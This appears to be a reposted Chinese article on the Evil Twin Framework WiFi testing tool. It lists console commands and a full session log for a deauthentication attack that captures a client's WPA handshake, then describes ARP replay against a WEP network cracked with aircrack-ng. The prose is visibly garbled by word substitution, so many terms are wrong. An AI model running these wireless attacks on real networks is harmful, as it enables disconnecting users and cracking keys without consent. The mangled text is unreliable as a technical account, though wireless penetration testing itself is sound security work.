ETF 启用了 AirScanner 模块并说明 IEEE 802.11 数据帧来发明 WPA 握手包。然后 AirInjecto 就可以行使扫除认证进攻来逼迫客户端断开毗连,以举办重连。必需在 ETF 上执行下面这些步调才气完成上面的方针:
- 进入 AirScanner 设置模式:config airscanner
- 配置 AirScanner 不跳信道:config airscanner
- 配置信道以嗅探颠末 WiFi 接入点信道的数据(APC):set fixed_sniffing_channel = <APC>
- 行使 CredentialSniffer 插件来启动 AirScanner 模块:start airscanner with credentialsniffer
- 从已嗅探的接入点列表中添加方针接入点的 BSSID(APS):add aps where ssid = <APS>
- 启用 AirInjector 模块,在默认环境下,它会启用扫除认证进攻:start airinjector
这些简朴的呼吁配置能让 ETF 在每次测试时执行乐成且有用的扫除认证进攻。ETF 也能在每次测试的时辰捕捉 WPA 的握手数据包。下面的代码能让我们看到 ETF 乐成的执行环境。
- ███████╗████████╗███████╗
- ██╔════╝╚══██╔══╝██╔════╝
- █████╗ ██║ █████╗
- ██╔══╝ ██║ ██╔══╝
- ███████╗ ██║ ██║
- ╚══════╝ ╚═╝ ╚═╝
- [+] Do you want to load an older session? [Y/n]: n
- [+] Creating new temporary session on 02/08/2018
- [+] Enter the desired session name:
- ETF[etf/aircommunicator/]::> config airscanner
- ETF[etf/aircommunicator/airscanner]::> listargs
- sniffing_interface = wlan1; (var)
- probes = True; (var)
- beacons = True; (var)
- hop_channels = false; (var)
- fixed_sniffing_channel = 11; (var)
- ETF[etf/aircommunicator/airscanner]::> start airscanner with
- arpreplayer caffelatte credentialsniffer packetlogger selfishwifi
- ETF[etf/aircommunicator/airscanner]::> start airscanner with credentialsniffer
- [+] Successfully added credentialsniffer plugin.
- [+] Starting packet sniffer on interface 'wlan1'
- [+] Set fixed channel to 11
- ETF[etf/aircommunicator/airscanner]::> add aps where ssid = CrackWPA
- ETF[etf/aircommunicator/airscanner]::> start airinjector
- ETF[etf/aircommunicator/airscanner]::> [+] Starting deauthentication attack
- - 1000 bursts of 1 packets
- - 1 different packets
- [+] Injection attacks finished executing.
- [+] Starting post injection methods
- [+] Post injection methods finished
- [+] WPA Handshake found for client '70:3e:ac:bb:78:64' and network 'CrackWPA'
行使 ARP 重放进攻并破解 WEP 无线收集
下面这个场景(图 3)将存眷 地点理会协议 (ARP)重放进攻的服从和捕捉包括初始化向量(IVs)的 WEP 数据包的速率。沟通的收集也许必要破解差异数目的捕捉的 IVs,以是这个场景的 IVs 上限是 50000。假如这个收集在初次测试时代,还未捕捉到 50000 IVs 就瓦解了,那么现实捕捉到的 IVs 数目会成为这个收集在接下来的测试里的新的上限。我们行使 aircrack-ng 对数据包举办破解。
测试场景从一个行使 WEP 协议举办加密的 WiFi 接入点和一台知道其密钥的离线客户端装备开始 —— 为了测试利便,密钥行使了 12345,但它可所以更长且更伟大的密钥。一旦客户端毗连到了 WEP 接入点,它会发送一个不须要的 ARP 数据包;这是要捕捉和重放的数据包。一旦被捕捉的包括 IVs 的数据包数目到达了配置的上限,测试就竣事了。
图 3:在举办扫除认证进攻后捕捉 WPA 握手包的场景
ETF 行使 Python 的 Scapy 库来举办包嗅探和包注入。为了最大限度地办理 Scapy 里的已知的机能题目,ETF 微调了一些初级库,来大大加速包注入的速率。对付这个特定的场景,ETF 为了更有服从地嗅探,行使了 tcpdump 作为靠山历程而不是 Scapy,Scapy 用于辨认加密的 ARP 数据包。 (编辑:湖南网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|